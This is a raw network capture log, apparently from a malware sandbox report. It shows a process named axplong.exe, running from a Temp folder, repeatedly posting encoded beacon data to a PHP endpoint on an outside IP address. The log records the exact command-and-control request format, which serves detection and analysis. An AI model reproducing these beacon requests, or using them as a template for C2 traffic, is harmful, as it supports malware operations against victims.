Sep 27, 2024 00:22:02.193285942 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	49856	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:02.205967903 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:02.914645910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	49857	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:03.049058914 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:03.746371984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	49858	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:03.759526968 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:04.477015972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	49859	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:04.598093033 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:05.300879002 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	49860	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:05.373241901 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:06.084554911 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	49861	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:06.204896927 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:06.932554960 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	49862	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:06.941968918 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:07.655658007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	49863	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:07.783236027 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:08.543771982 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	49864	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:08.555716991 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:09.286997080 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	49865	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:09.404624939 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:10.114869118 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	49866	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:10.125747919 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:10.839104891 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	49867	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:10.954468966 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:11.760190964 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	49868	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:11.770865917 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:12.477088928 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	49869	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:12.594504118 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:13.660491943 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:22:13.660800934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	49870	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:13.676693916 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:14.409393072 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	49871	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:14.531524897 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:15.275371075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	49872	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:15.285841942 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:16.013859034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	49873	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:16.127762079 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:17.020210028 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	49874	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:17.033510923 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:17.730068922 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	49875	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:17.849818945 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:18.551917076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	49876	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:18.563806057 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:19.312752962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	49877	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:19.439033985 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:20.143074036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	49878	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
